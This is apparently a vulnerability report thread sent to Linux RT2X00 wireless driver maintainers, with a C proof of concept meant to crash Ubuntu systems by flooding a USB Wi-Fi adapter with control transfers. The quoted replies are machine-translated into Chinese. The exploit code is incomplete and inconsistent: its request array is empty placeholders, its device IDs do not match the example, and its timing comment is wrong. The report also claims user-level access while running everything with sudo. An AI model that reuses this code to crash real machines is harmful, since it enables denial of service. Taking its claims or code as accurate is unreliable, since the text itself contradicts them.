Reproduction conditions for this vulnerability: Target version: Ubuntu22.04&24.04. Load the wireless network card using the RT2X00 driver to the target system. Use the lsusb command to view the ID and PID. For example: Bus 001 Device 008: ID 0a5c:bd17 Broadcom Corp. BCM43236 802.11abgn Wireless Adapter Replace dev = usb.core.find(idVendor=0a5c, idProduct=0xbd17) in the general script with the ID number of your own PC machine. Execute: sudo python3 poc.py and wait quietly, the system will crash directly. Note: pyusb library: PyUSB provides Python 3 with easy access to host Universal Serial Bus (USB) systems. This library is very safe. https://github.com/pyusb/pyusb or PIP install pyusb. I am submitting a C language POC to you, but I believe it is not as stable as the Python version. You can give it a try. poc.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <libusb-1.0/libusb.h> #define VENDOR_ID 0x148f #define PRODUCT_ID 0x3070 #define DATA_SIZE 64 // Define your requests here (example) struct usb_request { uint8_t bmRequestType; uint8_t bRequest; uint16_t wValue; uint16_t wIndex; uint16_t data_length; // You may need to adjust this based on your actual requests }; struct usb_request requests[] = { { /* fill with your request parameters */ }, { /* fill with your request parameters */ }, // Add more requests as needed }; int main() { libusb_device_handle *dev_handle; int r; // Initialize libusb r = libusb_init(NULL); if (r < 0) { fprintf(stderr, "Error initializing libusb: %s\n", libusb_error_name(r)); return 1; } // Open device dev_handle = libusb_open_device_with_vid_pid(NULL, VENDOR_ID, PRODUCT_ID); if (dev_handle == NULL) { fprintf(stderr, "Device not found or could not be opened.\n"); libusb_exit(NULL); return 1; } // Run specified requests int i, j; for (i = 0; i < 100; i++) { for (j = 0; j < sizeof(requests) / sizeof(requests[0]); j++) { struct usb_request *req = &requests[j]; unsigned char data[DATA_SIZE]; memset(data, 0xFF, DATA_SIZE); r = libusb_control_transfer(dev_handle, req->bmRequestType, req->bRequest, req->wValue, req->wIndex, data, req->data_length, 0); if (r < 0) { fprintf(stderr, "Control transfer failed: %s\n", libusb_error_name(r)); } usleep(100000); // Sleep for 0.3 seconds between requests } libusb_reset_device(dev_handle); // Reset device after each transfer } libusb_close(dev_handle); libusb_exit(NULL); return 0; } gcc -o usbpoc poc.c -lusb-1.0 sudo ./usbpoc Kalle Valo <kvalo@xxxxxxxxxx> 于2024年8月3日周六 05:03写道: > > Mark Esler < mark.esler@xxxxxxxxxxxxx > 写道: > > > 2024 年 8 月 2 日星期五下午 03:57:47 +0800,color Ice 写道: > >> 尊敬的 RT2X00 驱动程序维护人员, > >> > >> 我们在 RT2X00 驱动程序中发现了一个严重漏洞。我们 > 建议紧急提交更新。 > >> > >> *漏洞描述*:当 PC 运行 Ubuntu 22.04 或 24.04 时, > 执行我们的概念验证 (POC) 可能会直接导致空指针 > 取消引用或释放后使用 (UAF)。我们测试的系统是: > >> > >> - *说明*:Ubuntu 22.04.4 LTS *发布*:22.04 > >> - *说明*:Ubuntu 24.04 LTS *发布*:24.04 > >> > >> 我们测试了 RT2870/RT3070/RT5370 系列的网卡,它们都 > 属于 RT2X00 驱动程序组,并且都能够触发漏洞 > 。此外,执行 POC 只需要用户级 > 权限。Debian 系统不受影响。 > > > > 目前尚不清楚 Ubuntu 是否是唯一受影响的发行版。 > > 由于没有关于该 > 问题的描述,因此也不清楚这是如何工作的。我不会运行任何脚本,也不知道 python > usb.core 包是如何工作的。我猜它需要 root 权限才能 > 发送这些 USB 命令?如果这确实是一个安全漏洞,以下是 如何报告它们的 > > 说明: https://docs.kernel.org/proces s/security-bugs.html 还添加了 Greg。-- https : //patchwork.kernel.org/project/linux-wireless/list/ https://wireless.wiki.kernel.o rg/en/developers/documentation /submittingpatches > > > > > > > > > >
